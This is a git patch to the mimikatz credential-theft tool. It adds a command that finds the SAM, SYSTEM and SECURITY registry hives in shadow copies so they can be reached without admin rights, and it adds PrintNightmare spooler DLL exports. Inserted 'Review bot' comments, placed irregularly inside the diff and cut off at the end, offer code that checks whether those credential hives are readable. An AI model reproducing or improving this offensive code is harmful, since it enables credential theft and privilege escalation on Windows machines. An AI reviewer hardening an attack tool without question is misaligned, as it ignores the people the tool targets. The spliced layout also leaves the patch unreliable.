From ba3c2c66f6c799bd1317b64075056304180cb501 Mon Sep 17 00:00:00 2001 From: Benjamin DELPY Date: Wed, 21 Jul 2021 23:50:54 +0200 Subject: [PATCH] [new] mimikatz misc::shadowcopies (to display some properties without admin rights) [new] mimikatz mimispool module includes some functions for printnigtmare v3/v4 (must be recompiled after adjust) [internal] new ntdll.min.lib to call NtOpenDirectoryObject/NtQueryDirectoryObject --- lib/Win32/ntdll.min.lib | Bin 11542 -> 12044 bytes lib/x64/ntdll.min.lib | Bin 10838 -> 11300 bytes mimikatz/modules/kuhl_m_misc.c | 83 +++++++++++++++++++++++++++++++++ mimikatz/modules/kuhl_m_misc.h | 1 + mimispool/mimispool.c | 20 +++++--- mimispool/mimispool.def | 5 +- mimispool/mimispool.h | 5 +- modules/kull_m_process.h | 70 +++++++++++++++++++++++++++ modules/kull_m_string.c | 16 +++++++ modules/kull_m_string.h | 1 + 10 files changed, 193 insertions(+), 8 deletions(-) 
diff --git a/lib/Win32/ntdll.min.lib b/lib/Win32/ntdll.min.lib index 79c592d5e2dfca03bcd4f3834dd10e44a74379b1..fce1d30949058147b0c79ad9670004a47eac7b44 100644 GIT binary patch literal 12044 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 I;X)PAf1ls!W&i*H 
diff --git a/lib/x64/ntdll.min.lib b/lib/x64/ntdll.min.lib index 8ebb06ef46d2e8b819bee6888f168282ce47aba7..626afbe1c5667f8ef8953e80dabecbae79d299da 100644 GIT binary patch literal 11300 zcmcIp&2Jn<7JqSIlb8Tr5<=|wWBe7{353MV42cwF9c%*@VQlPi!p$Cg+R1>Y$Mp1g zlU(+O5L#)k91xe45XwKWSHyt>AhgmRk%ELGj)((?71E0RRabRYS9Nu}$K#CjrmE|` zs$W(0t5@&69==-fHt$^PemSTAE)}PXS1wNHujKXii{f#*cyXFn*Sm@67SYLvL@%Iv zI#1O5F{d*(i30itC1_xb)8MZ}j0Qg8G_*k!(Dx`oxvPR6pacz%a2h#E6wo7-pwV{) zeT5P!X!3VXQ!Y_JKcNJjD+&4}qrOw| zoO0uR$8Dm2t-iBnwwC;NT8?*b!QExJzDR(`hRCB);gmxbdE|>C4drY0)Mm zR_--@ryfDjh2!j!zvB4u=5PU4X31Z6nytEH&R%cD$gSp%<5o>Eqq*dl9j{(1?n=2RnXLLy=POi*V*e!1n&IZPjQj@+~a zKJPj2ruVe*(UY%$t(dJ)ZI96oNo`W)hD`;MMOgoxhz`%*sdx%3&NAiAjn;YyroB(O zp>#*?q@{aQ4kIyTg7x-bh@m~V8s7UWJC#jmrFK7JUDAXwMmWH0t*tF5vRtDblI*o} zFjF?hf%L-8ZvJ|;%H|eYo?B`&tz6!#nA$7O)$WgZcemy>+&Yfk&B}JmnZGMA_mYa- zCMjdcOT{9SijZX%xQi3Vm;I9^O8&fytIdPW=C`6b$7Wv&k}tHx{v2;6GWebexD?Ar-*(6mCg}; z4Jw`|`U3Pb+Mm*`3Q6HUCEf9P$4`=Sy&G-lD1Dm}j75cKwI?Yy1cn7%>+xbS^C* ziH9(NkX#*LZ|4#A&-4*l(|-Lt^o<*FtLtVOcJ$2TuR$)8`vtj}f5aNJtC%1acVPCo zy)wB|7ke6tROyrJ?NJZu#2hj~iI3;=bV`gJdi3qeD#RhB` zl5pHu$jKSd7}KaIMxtp^A}KMV6f(?=YEO(HV;-aIV>djK9gPh2M%|c5o)PhB?G~py zZkA*Z!#Jt-tX{Z19E=5ca^Q&3(%KSMYBgZ0hE29>Q%#7+ zGKO5j)TyDP{Wvok9wp?vf-KktWXgo&d1;TVX8v+Pu#g38~+2T{&Y&ubTI)rwzX*+~9lZtJ(8AI0-wlrwbkOCg7BBL8)x z_#Y^gW34lk`?3pV4}3=UJ0=%3K__~Spyl5|JHeAA+WO_Ww`-eTquJQLA9`Uc+c|3MkjhzJ~J$2VquiqzTOfPq+2dDqlQf9FGn<_E6|XCVM=_e zb`7aU7Qm_z4S6MGF%9`=_#jHAA#B_Oe)C!0DB>vWazb*s?LE6Jg1DSIRX+eAZO>9p zRY7b|a4OlUivDJ3COlR7u$`UW|AY^sWO4_*w^{ZTv1(FozTI8T7lk5XS1CA})eo7y zLdc2V6R{{xj!&|dQRj=V+L2xc&Y=J)gL^1JsqHgY2-U|}X%6@-2DXQu3Q*QEuD9@t zeZ2_!VI&!z)sK}h`&ePZyF_{dcoH$_j^4iZ zgr5wJw}-R|vLO=39>ps(Rm-@(VuIEnm4p1t9=Pz%_rKyo=tLMR9tHAI6FKruBam&M zku+;?EWp$wm=0DKUVz5xkU~Q?i|wn7XJS#&{!xo5TJ%&pYG>~<#TFdbaS!TECRkf` zbv(@x_3xExQ`^^?D|SoAuK#BOtXQ1+n9!aDnk9Jc0IiU)Hl%mqQE{}yh`0mX;wAf@ zB9)BXF2_v?vpYbRuBmY{k(5SGIY2gIcLgSE8Lev};XE?;{e-|W^8pe=8M*^NJIT>v zIff3DED`^|s*N}vJm!0l29M8yEsl~}!#(hk) 
zVf_LtB@ZUy+TYcD${QR|$SS$k0aluyKPa(c8M_V;(|qnBju=S;Dj-?Q`2Gqhx|vfr z2d0~agjiw(x;ZTHY#&_Yy4toXX^0~dF`fhM05K&-8|8=zdDX{*IVLe}x!V0>rrGOp zj%nn7_m7q4qn+hgnvQBYWd+-|EloQg69PAya1Or4b%K`?MNC@oME1J_#A3pUd=V#d MDiJZ7Qdi*r2WXPQ>i_@% delta 2123 zcmaKsU1(cn7{{NrS(`RlllGkE-Krxy-87|v-sKVafVgb7`e!6x%U zGVkiVDSdXQD+3i~nJDx^=#_WER>s`Lm|bC4f+C2FT}&9k|9jrJb8?gwetihf$NRj` z|9Q_>uisf*)kmtcwR-KDYJG;=W~g(pTCXOozqdz;=v5-+0Z~XL(iVuq>k@s1$l@_9 zFi%LLDI$S+T@t;7-ynuk7EM^et|Y!lBuLCjlARDyQgE@yLs*b%NYe8}g48WZW{t?A z3k%ZMB-u8R#a&pCFZZ|t3kqtF3$TJmlDGDsBC^7XLiRKazFiCU~JOm90G@mBA1-q6Z>Vj+d-Odu-1?4=^ zl{~#bYJunicmz)EC)xpF1m8r_t0=mVBiaJH2GK?Yg<-3(UNnWpArF=Kv~P)wUfuH}mSaXa&O3 zAV&An+2iNl=bw#?9Ve=P6H}}*kc2$kiOl!A??t4$2=`vN6RbsJb_lxAcquAlAUO^3 znW(!HT+KQHYSJ+O8l7_G&-7Y=@{s9RY|i$(I~;*K=4#>Pk{kp!kw*F1c+E~1Um#x1 z$>XujvomwvJ7el`;apW@%gpSt`ScZ!Nn3>sTbW0>J5gE4MpBX*UwoNN%= zP62Ku57{oO!R@4M0Gm!h{yphza5Yu*i{f~CG!7Lx;Zb=xWjabYLncH>#jA2R=?rnJ zr0{{XTcwq>s*02F)<{K}SI#aUK6CD!Wez6Oj?+Y`uMH`90-=)}$W;6MA$DFU#GQ=u zLT*Jg{-e+TV_psmp9Bi?YuTsO*7>Kbqc-Mj%}UJK5QCUf;=Gh|DDj_tF!|e@qXIj3 zDZ+Z*y-Rph)+&of73I(J&R2}itvwK($FK+Y$3p#kz?DK#5hKQTlHzj2N7^4&`F_D! z2T@iX5tTq4e?aHI3jK1*2=Vljh%kptoHWYonejd)?5Gr?4h8-{s$Z`(PZymN5qe|8 zty_x?&+z9($2WqVdSzKDIrYLct(%CKnL`IBhc#|yqjrztdH+&UtgmdD10}eJC)g;D F{sW$n-T(jq diff --git a/mimikatz/modules/kuhl_m_misc.c b/mimikatz/modules/kuhl_m_misc.c index c5df894..12477fb 100644 --- a/mimikatz/modules/kuhl_m_misc.c +++ b/mimikatz/modules/kuhl_m_misc.c @@ -30,6 +30,7 @@ const KUHL_M_C kuhl_m_c_misc[] = { {kuhl_m_misc_spooler, L"spooler", NULL}, {kuhl_m_misc_printnightmare, L"printnightmare", NULL}, {kuhl_m_misc_sccm_accounts, L"sccm", NULL}, + {kuhl_m_misc_shadowcopies, L"shadowcopies", NULL}, }; const KUHL_M kuhl_m_misc = { L"misc", L"Miscellaneous module", NULL, 
@@ -1883,3 +1884,85 @@ NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[])
 return STATUS_SUCCESS;
 }
 
+
+DECLARE_CONST_UNICODE_STRING(usRootDevice, L"\\Device");
+DECLARE_CONST_UNICODE_STRING(usDevice, L"Device");
+const OBJECT_ATTRIBUTES oaDevice = RTL_CONSTANT_OBJECT_ATTRIBUTES(&usRootDevice, 0);
+const wchar_t *INT_FILES[] = {L"SYSTEM", L"SAM", L"SECURITY", L"SOFTWARE"};
+NTSTATUS kuhl_m_misc_shadowcopies(int argc, wchar_t * argv[])
+{
+ NTSTATUS status;
+ HANDLE hDeviceDirectory;
+ BYTE Buffer[0x100];
+ ULONG Start, Context, ReturnLength, i, j;
+ BOOLEAN RestartScan;
+ POBJECT_DIRECTORY_INFORMATION pDirectoryInformation;
+ PWSTR szName, szShadowName, szFullPath;
+ WIN32_FILE_ATTRIBUTE_DATA Attribute;
+
+ status = NtOpenDirectoryObject(&hDeviceDirectory, DIRECTORY_QUERY | DIRECTORY_TRAVERSE, (POBJECT_ATTRIBUTES) &oaDevice);
+ if(NT_SUCCESS(status))
+ {
+ for(Start = 0, Context = 0, RestartScan = TRUE, status = STATUS_MORE_ENTRIES; status == STATUS_MORE_ENTRIES; )
+ {
+ status = NtQueryDirectoryObject(hDeviceDirectory, Buffer, sizeof(Buffer), FALSE, RestartScan, &Context, &ReturnLength);
+ if(NT_SUCCESS(status))
+ {
+ pDirectoryInformation = (POBJECT_DIRECTORY_INFORMATION) Buffer;
+ for(i = 0; i < (Context - Start); i++)
+ {
+ if(RtlEqualUnicodeString(&usDevice, &pDirectoryInformation[i].TypeName, TRUE))
+ {
+ szName = kull_m_string_unicode_to_string(&pDirectoryInformation[i].Name);
+ if(szName)
+ {
+ if(szName == wcsstr(szName, L"HarddiskVolumeShadowCopy"))
+ {
+ if(kull_m_string_sprintf(&szShadowName, L"\\\\?\\GLOBALROOT\\Device\\%s\\", szName))
+ {
+ kprintf(L"\nShadowCopy Volume : %s\n", szName);
+ kprintf(L"| Path : %s\n", szShadowName);
+
+ if(GetFileAttributesEx(szShadowName, GetFileExInfoStandard, &Attribute))
+ {
+ kprintf(L"| Volume LastWrite: ");
+ kull_m_string_displayLocalFileTime(&Attribute.ftLastWriteTime);
+ kprintf(L"\n");
+ }
+ else PRINT_ERROR_AUTO(L"GetFileAttributesEx");
+ kprintf(L"\n");
+ for(j = 0; j < ARRAYSIZE(INT_FILES); j++)
+ {
+ if(kull_m_string_sprintf(&szFullPath, L"%sWindows\\System32\\config\\%s", szShadowName, INT_FILES[j]))
+ {
+ kprintf(L"* %s\n", szFullPath);
+
+ if(GetFileAttributesEx(szFullPath, GetFileExInfoStandard, &Attribute))
+ {
+ kprintf(L" | LastWrite : ");
+ kull_m_string_displayLocalFileTime(&Attribute.ftLastWriteTime);
+ kprintf(L"\n");
+ }
+ else PRINT_ERROR_AUTO(L"GetFileAttributesEx");
+
+ LocalFree(szFullPath);
+ }
+ }
+ LocalFree(szShadowName);
+ }
+ }
+ LocalFree(szName);
+ }
+ }
+ }
+ Start = Context;
+ RestartScan = FALSE;
+ }
+ else PRINT_ERROR(L"NtQueryDirectoryObject: 0x%08x\n", status);
+ }
+ CloseHandle(hDeviceDirectory);
+ }
+ else PRINT_ERROR(L"NtOpenDirectoryObject: 0x%08x\n", status);
+
+ return STATUS_SUCCESS;
+}
\ No newline at end of file
diff --git a/mimikatz/modules/kuhl_m_misc.h b/mimikatz/modules/kuhl_m_misc.h
index 84be28a..4baa354 100644
--- a/mimikatz/modules/kuhl_m_misc.h
+++ b/mimikatz/modules/kuhl_m_misc.h
@@ -47,6 +47,7 @@ NTSTATUS kuhl_m_misc_aadcookie_NgcSignWithSymmetricPopKey(int argc, wchar_t * ar
 NTSTATUS kuhl_m_misc_spooler(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]);
+NTSTATUS kuhl_m_misc_shadowcopies(int argc, wchar_t * argv[]);
 
 BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary);
 BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64, BOOL bIsDynamic, LPCWSTR szForce, BOOL bIsPar, handle_t hRemoteBinding);
diff --git a/mimispool/mimispool.c b/mimispool/mimispool.c
index b233b86..e140c1a 100644
--- a/mimispool/mimispool.c
+++ b/mimispool/mimispool.c
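Review bot: In the `INT_FILES` loop, a successful `GetFileAttributesEx(szFullPath, ...)` only shows that the hive exists in the shadow copy and that its attributes can be queried; it does not show that the current token can open the file for reading, which is the property a non-admin caller of this command actually wants to know (the commit message frames the command as working "without admin rights"). An explicit open-for-read probe per hive, with its outcome printed next to the LastWrite line, keeps the output from implying access that may not exist; the excerpt below does that and needs a `HANDLE hFile;` added to the locals. Separately, the outer `for(...; status == STATUS_MORE_ENTRIES; )` assumes `Context` advances on every successful call: with a fixed 0x100-byte `Buffer`, a `STATUS_MORE_ENTRIES` return that yields no entry (so `Context == Start`) would spin forever, and other object-directory enumerators guard that case, so `if(Context == Start) break;` after the inner loop is a cheap safeguard (I have not verified which status the kernel returns when no entry fits).
```c
// … unchanged: kprintf(L"* %s\n", szFullPath); GetFileAttributesEx / LastWrite block …
hFile = CreateFile(szFullPath, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
if(hFile != INVALID_HANDLE_VALUE)
{
	kprintf(L" | Readable  : yes\n");
	CloseHandle(hFile);
}
else PRINT_ERROR_AUTO(L"CreateFile (GENERIC_READ)");

LocalFree(szFullPath);
```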
@@ -14,7 +14,7 @@ BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserv
 case DLL_PROCESS_ATTACH:
 kspool(TEXT(__FUNCTION__) L"-PROCESS_ATTACH");
 ret = FALSE;
- // FALSE avoid to keep library in memory
+ // FALSE avoid to keep library in memory (PrintNightmare < 3/4)
 // TRUE will mimic "real" driver/config -- to use/test with /useown on local (remote is not compatible with GetFileVersionInfo*)
 break;
 
@@ -100,11 +100,7 @@ void kspool(LPCWSTR szFrom)
 if(kspool_logfile = _wfopen(L"mimispool.log", L"a"))
 #pragma warning(pop)
 {
- if(GetUserName(Buffer, &cbBuffer))
- {
- klog(kspool_logfile, L"[" PLATFORM L"] [%s] I\'m running with \'%s\' (and I like it :)\n", szFrom, Buffer);
- }
-
+ klog(kspool_logfile, L"[" PLATFORM L"] [%s] as \'%s\'\n", szFrom, GetUserName(Buffer, &cbBuffer) ? Buffer : L"-");
 fclose(kspool_logfile);
 }
 }
@@ -119,4 +115,16 @@ void klog(FILE * logfile, PCWCHAR format, ...)
 va_end(args);
 fflush(logfile);
 }
+}
+
+DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags)
+{
+ kspool(TEXT(__FUNCTION__));
+ return ERROR_SUCCESS;
+}
+
+BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent)
+{
+ kspool(TEXT(__FUNCTION__));
+ return TRUE;
 }
\ No newline at end of file
diff --git a/mimispool/mimispool.def b/mimispool/mimispool.def
index 2f4b69f..8b85595 100644
--- a/mimispool/mimispool.def
+++ b/mimispool/mimispool.def
@@ -4,4 +4,7 @@ EXPORTS
 DrvEnableDriver
 DrvDisableDriver
- DrvResetConfigCache
\ No newline at end of file
+ DrvResetConfigCache
+
+ GenerateCopyFilePaths
+ SpoolerCopyFileEvent
\ No newline at end of file
diff --git a/mimispool/mimispool.h b/mimispool/mimispool.h
index 6c17c71..2fb66cb 100644
--- a/mimispool/mimispool.h
+++ b/mimispool/mimispool.h
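Review bot: `GenerateCopyFilePaths` returns `ERROR_SUCCESS` without ever writing `pszSourceDir`/`pszTargetDir` or updating `*pcchSourceDirSize`/`*pcchTargetDirSize`, so a caller that trusts the success code will consume whatever those buffers already held. If the stub is only meant to record that the export was reached, either return a failure such as `ERROR_NOT_SUPPORTED`, or at minimum terminate both outputs: `if(pszSourceDir && pcchSourceDirSize && *pcchSourceDirSize) *pszSourceDir = L'\0';` and the same for the target pair. A one-line comment on each of the two new exports saying that they are spooler CopyFiles-module callbacks (as the commit message's "printnightmare v3/v4" wording suggests; the registration path is not visible in this diff) and that they intentionally only log would spare the next reader the guesswork. The reworked `klog` line also now writes `-` when `GetUserName` fails, which hides that failure in the log; logging `GetLastError()` in that branch would keep the information.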
@@ -33,4 +33,7 @@ __control_entrypoint(DeviceDriver) BOOL APIENTRY DrvEnableDriver(ULONG iEngineVe
 VOID APIENTRY DrvDisableDriver();
 
 void kspool(LPCWSTR szFrom);
-void klog(FILE * logfile, PCWCHAR format, ...);
\ No newline at end of file
+void klog(FILE * logfile, PCWCHAR format, ...);
+
+DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags);
+BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent);
\ No newline at end of file
diff --git a/modules/kull_m_process.h b/modules/kull_m_process.h
index fadf075..aa6ca9d 100644
--- a/modules/kull_m_process.h
+++ b/modules/kull_m_process.h
@@ -373,6 +373,74 @@ typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION {
 //ULONGLONG Spare1;
 } SYSTEM_ISOLATED_USER_MODE_INFORMATION, *PSYSTEM_ISOLATED_USER_MODE_INFORMATION;
 
+#define OBJ_INHERIT 0x00000002L
+#define OBJ_PERMANENT 0x00000010L
+#define OBJ_EXCLUSIVE 0x00000020L
+#define OBJ_CASE_INSENSITIVE 0x00000040L
+#define OBJ_OPENIF 0x00000080L
+#define OBJ_OPENLINK 0x00000100L
+#define OBJ_KERNEL_HANDLE 0x00000200L
+#define OBJ_FORCE_ACCESS_CHECK 0x00000400L
+#define OBJ_VALID_ATTRIBUTES 0x000007F2L
+
+typedef struct _OBJECT_ATTRIBUTES64 {
+ ULONG Length;
+ ULONG64 RootDirectory;
+ ULONG64 ObjectName;
+ ULONG Attributes;
+ ULONG64 SecurityDescriptor;
+ ULONG64 SecurityQualityOfService;
+} OBJECT_ATTRIBUTES64;
+typedef OBJECT_ATTRIBUTES64 *POBJECT_ATTRIBUTES64;
+typedef CONST OBJECT_ATTRIBUTES64 *PCOBJECT_ATTRIBUTES64;
+
+typedef struct _OBJECT_ATTRIBUTES32 {
+ ULONG Length;
+ ULONG RootDirectory;
+ ULONG ObjectName;
+ ULONG Attributes;
+ ULONG SecurityDescriptor;
+ ULONG SecurityQualityOfService;
+} OBJECT_ATTRIBUTES32;
+typedef OBJECT_ATTRIBUTES32 *POBJECT_ATTRIBUTES32;
+typedef CONST OBJECT_ATTRIBUTES32 *PCOBJECT_ATTRIBUTES32;
+
+typedef struct _OBJECT_ATTRIBUTES {
+ ULONG Length;
+ HANDLE RootDirectory;
+ PUNICODE_STRING ObjectName;
+ ULONG Attributes;
+ PVOID SecurityDescriptor; // Points to type SECURITY_DESCRIPTOR
+ PVOID SecurityQualityOfService; // Points to type SECURITY_QUALITY_OF_SERVICE
+} OBJECT_ATTRIBUTES;
+typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
+typedef CONST OBJECT_ATTRIBUTES *PCOBJECT_ATTRIBUTES;
+
+#define InitializeObjectAttributes( p, n, a, r, s ) { \
+ (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
+ (p)->RootDirectory = r; \
+ (p)->Attributes = a; \
+ (p)->ObjectName = n; \
+ (p)->SecurityDescriptor = s; \
+ (p)->SecurityQualityOfService = NULL; \
+ }
+
+#define RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a) \
+ { sizeof(OBJECT_ATTRIBUTES), NULL, RTL_CONST_CAST(PUNICODE_STRING)(n), a, NULL, NULL }
+
+#define RTL_INIT_OBJECT_ATTRIBUTES(n, a) RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a)
+
+#define DIRECTORY_QUERY 0x0001
+#define DIRECTORY_TRAVERSE 0x0002
+#define DIRECTORY_CREATE_OBJECT 0x0004
+#define DIRECTORY_CREATE_SUBDIRECTORY 0x0008
+#define DIRECTORY_ALL_ACCESS STANDARD_RIGHTS_REQUIRED | 0xF
+
+typedef struct _OBJECT_DIRECTORY_INFORMATION {
+ UNICODE_STRING Name;
+ UNICODE_STRING TypeName;
+} OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION;
+
 extern NTSTATUS WINAPI NtQuerySystemInformation(IN SYSTEM_INFORMATION_CLASS SystemInformationClass, OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT OPTIONAL PULONG ReturnLength);
 extern NTSTATUS WINAPI NtQuerySystemInformationEx(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID InputBuffer, ULONG InputBufferLength, PVOID SystemInformation, ULONG SystemInformationLength, ULONG *ReturnLength);
 extern NTSTATUS WINAPI NtSetSystemInformation(IN SYSTEM_INFORMATION_CLASS SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength);
@@ -380,6 +448,8 @@ extern NTSTATUS WINAPI NtQueryInformationProcess(IN HANDLE ProcessHandle, IN PRO
 extern NTSTATUS WINAPI NtSuspendProcess(IN HANDLE ProcessHandle);
 extern NTSTATUS WINAPI NtResumeProcess(IN HANDLE ProcessHandle);
 extern NTSTATUS WINAPI NtTerminateProcess(IN OPTIONAL HANDLE ProcessHandle, IN NTSTATUS ExitStatus);
+extern NTSTATUS WINAPI NtOpenDirectoryObject(OUT PHANDLE DirectoryHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes);
+extern NTSTATUS WINAPI NtQueryDirectoryObject(IN HANDLE DirectoryHandle, OUT OPTIONAL PVOID Buffer, IN ULONG Length, IN BOOLEAN ReturnSingleEntry, IN BOOLEAN RestartScan, IN OUT PULONG Context, OUT OPTIONAL PULONG ReturnLength);
 
 typedef NTSTATUS (WINAPI * PNTQUERYSYSTEMINFORMATIONEX) (SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID InputBuffer, ULONG InputBufferLength, PVOID SystemInformation, ULONG SystemInformationLength, ULONG *ReturnLength);
 
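Review bot: `#define DIRECTORY_ALL_ACCESS STANDARD_RIGHTS_REQUIRED | 0xF` expands unparenthesized, so any use inside a larger expression (`DIRECTORY_ALL_ACCESS & ~DIRECTORY_CREATE_OBJECT`, a cast, a ternary) binds the `|` wrongly; it is the only macro in this hunk with an operator in its body, so it is the only one that needs it: `#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF)`. The `OBJ_*` constants, the three `OBJECT_ATTRIBUTES` typedefs, `InitializeObjectAttributes` and `RTL_CONSTANT_OBJECT_ATTRIBUTES` duplicate names that the SDK's `winternl.h`/`ntdef.h` also define, and a struct typedef redefinition is a hard error; I cannot see this header's include set, so a one-line comment such as `// local copies of the ntdef.h object-manager definitions; keep winternl.h out of any TU that includes this header` would record both the reason they are here and the constraint they impose. `OBJECT_DIRECTORY_INFORMATION` is indexed as an array by the new `kuhl_m_misc_shadowcopies`, which is worth noting on 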